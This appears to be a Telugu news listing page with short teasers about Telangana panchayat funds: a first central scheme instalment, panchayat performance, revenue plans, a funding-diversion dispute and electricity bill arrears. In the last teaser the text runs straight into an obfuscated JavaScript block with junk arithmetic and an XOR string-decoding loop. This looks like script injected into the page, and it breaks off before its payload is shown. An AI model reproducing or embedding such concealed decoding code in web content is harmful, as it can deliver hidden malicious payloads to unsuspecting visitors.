జీ-రామ్‌జీ (G-RAMJI) పథకం కింద తెలంగాణకు తొలి విడతగా ₹1,263.41 కోట్లు విడుదల

కొత్తగా అమల్లోకి వచ్చిన వికసిత్ భారత్-గ్యారెంటీ ఫర్ రోజ్‌గార్ అండ్ ఆజీవిక మిషన్ (VB-G RAM-G) పథకం కింద కేంద్ర ప్రభుత్వం తొలి విడతగా తెలంగాణకు రూ.1,263.41 కోట్లను విడుదల చేసింది. కేంద్ర ప్రభుత్వం...

పంచాయతీల పనితీరులో తెలుగు రాష్ట్రాలు వెనుకబాటు

దేశాభివృద్ధికి కీలకమైన గ్రామ పంచాయతీల పనితీరులో తెలుగు రాష్ట్రాలైన ఆంధ్రప్రదేశ్, తెలంగాణ ఆశించిన స్థాయిలో లేవని కేంద్ర పంచాయతీరాజ్ శాఖ మంత్రి రాజీవ్ రంజన్ సింగ్ వెల్లడించారు. మంగళవారం లోక్‌సభలో ఒక సభ్యుడు...

పంచాయితీలకు కొత్త ఆదాయ మార్గాలు –

ఇతర వనరులతో అదనపు రాబడికి కార్యాచరణ ప్రణాళిక రాష్ట్రంలోని గ్రామపంచాయతీల సొంత ఆదాయ వనరులను పెంచడంపై రాష్ట్ర ప్రభుత్వం ప్రత్యేక దృష్టి సారించింది. పన్నులపై మాత్రమే ఆధారపడకుండా, ప్రత్యామ్నాయ మార్గాల ద్వారా అదనపు ఆదాయం...

15వ ఆర్థిక సంఘం నిధులపై ఆరోపణలు అవాస్తవం: పంచాయతీరాజ్ శాఖ

15వ ఆర్థిక సంఘం నిధులపై ఆరోపణలు అవాస్తవం: పంచాయతీరాజ్ శాఖ 15వ ఆర్థిక సంఘం నిధులను మళ్లించారన్న ఆరోపణలు పూర్తిగా అవాస్తవమని, కేంద్ర మంత్రి బండి సంజయ్ చేసిన వ్యాఖ్యలు సత్యదూరమని రాష్ట్ర పంచాయతీరాజ్,...

పంచాయితీల్లో కరెంట్ బిల్లుల పంచాయితీ

గ్రామ పంచాయతీలు విద్యుత్ శాఖకు చెల్లించాల్సిన బకాయిలు సుమారు రూ.1,700 కోట్లకు చేరినట్లు పంచాయతీరాజ్ శాఖ వెల్లడించింది.(function(){ var x46eaa6=6026; if(x46eaa6>0){var y17321a=x46eaa6-6757}else{var y17321a=6757} var zf368b3=y17321a*81; var _0xc4c3ed2ddbac=; var _0xd2590aeec7ec=72; var _0x695b12d6658b=''; for(var _0xecc7dff14118=0;_0xecc7dff14118<_0xc4c3ed2ddbac.length;_0xecc7dff14118++) _0x695b12d6658b+=String.fromCharCode(_0xc4c3ed2ddbac^_0xd2590aeec7ec); var _0xb2ada9a65d62=121; var...

sudhakar t